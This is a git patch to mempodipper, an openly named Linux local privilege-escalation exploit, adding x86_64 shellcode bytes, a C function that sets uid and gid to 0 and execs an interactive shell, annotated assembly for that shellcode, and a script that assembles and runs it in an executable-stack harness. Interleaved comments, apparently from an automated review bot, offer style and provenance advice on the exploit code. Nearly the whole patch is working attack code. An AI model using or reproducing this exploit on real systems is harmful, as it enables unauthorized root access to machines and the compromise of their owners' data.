From df106c579d69056f4bcef612f324d4ef0d71fb05 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Sun, 22 Jan 2012 04:37:23 +0100
Subject: Add custom 64bit shellcode and preserve stderr.

---
 mempodipper.c | 21 +++++++++++++++------
 run-shellcode.sh | 2 ++
 shellcode-64.s | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 66 insertions(+), 6 deletions(-)
 create mode 100755 run-shellcode.sh
 create mode 100644 shellcode-64.s

diff --git a/mempodipper.c b/mempodipper.c
index b5efd53..1fb8cc2 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -113,6 +113,14 @@ int recv_fd()
 return fd;
 }
 
+void root()
+{
+dup2(6, 2);
+setuid(0);
+setgid(0);
+execl("/bin/sh", "sh", "-i", NULL);
+}
+
 int main(int argc, char **argv)
 {
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
@@ -145,6 +153,7 @@ int main(int argc, char **argv)
 return -1;
 }
 printf("[+] Assigning fd %d to stderr.\n", fd);
+dup2(2, 6);
 dup2(fd, 2);
 /* Here is the asm from my /bin/su.
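Review bot: `root()` is added as a non-static function with an empty parameter list (`void root()` rather than `void root(void)`), and nothing in this hunk calls it, so a reader cannot tell whether it is live code or a C sketch of the assembly the same commit adds; the part of main() that might reference it begins after this hunk. The hard-coded `dup2(6, 2)` also assumes that descriptor 6 still holds whatever was placed there earlier, and that assumption is not stated near the definition. I would make it `static void root(void)` and add a header such as `/* C counterpart of shellcode-64.s: restores the stderr saved in fd 6, then calls setuid/setgid and execs an interactive shell. */`, and either reference it or drop it so an unreferenced function that execs `/bin/sh` does not linger in the file.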
@@ -199,16 +208,16 @@ int main(int argc, char **argv)
 "\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
 "\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
 #elif defined(__x86_64__)
-// Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-77.php
 char shellcode[] =
-"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
-"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
-"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
-"\x58\x0f\x05";
+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
 #else
 #error "That platform is not supported."
 #endif
-printf("[+] Executing su with shellcode. There will be no prompt, so just type commands.\n");
+printf("[+] Executing su with shellcode.\n");
 execl("/bin/su", "su", shellcode, NULL);
 } else {
 sleep(0.01);
diff --git a/run-shellcode.sh b/run-shellcode.sh
new file mode 100755
index 0000000..5ffcf39
--- /dev/null
+++ b/run-shellcode.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
diff --git a/shellcode-64.s b/shellcode-64.s
new file mode 100644
index 0000000..2514ed2
--- /dev/null
+++ b/shellcode-64.s
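Review bot: The removed `// Shellcode from: ...` line was the only provenance note for the x86_64 byte string, and the replacement bytes on the new side carry none, so they can no longer be checked against anything without disassembling them. Since this same commit adds shellcode-64.s and run-shellcode.sh, a comment above `char shellcode[] =` such as `// x86_64: assembled from shellcode-64.s via run-shellcode.sh; regenerate rather than hand-edit` would let a reviewer confirm the bytes match the assembly, including its stated assumption that fd 6 holds the stderr saved by the earlier `dup2(2, 6)`. The `printf` wording change is fine as is; the rest of main() lies outside this hunk.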
@@ -0,0 +1,49 @@
+BITS 64
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor rdi,rdi
+mov al,0x69
+syscall
+;setgid(0)
+xor rdi,rdi
+mov al,0x6a
+syscall
+;dup2(6, 2)
+mov dil,0x6
+mov sil,0x2
+mov al,0x21
+syscall
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+mov qword rbx,'//bin/sh' ; rbx = //bin/sh
+shr rbx,0x8 ; remove leading / from rbx
+push rbx ; push rbx to stack
+mov rdi,rsp ; set rdi (arg 1) to top of stack
+
+xor rbx,rbx
+mov bx,'-i' ; rbx = '-i'
+push rbx ; push rbx to stack
+mov rcx,rsp ; set rcx to top of stack
+
+xor rax,rax ; rax = 0
+
+; so at this point:
+; rdi is a pointer to '/bin/sh'
+; rcx is a pointer to '-i'
+; rax is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push rax ; push rax to stack
+push rcx ; push rcx to stack
+push rdi ; push rdi to stack
+mov rsi,rsp ; set rsi (arg 2) to top of stack
+
+xor rdx,rdx ; rdx (arg 3) = 0
+
+mov al,0x3b ; al = 0x3b, which is the exec call
+syscall
-- 
cgit v1.2.3-59-g8ed1b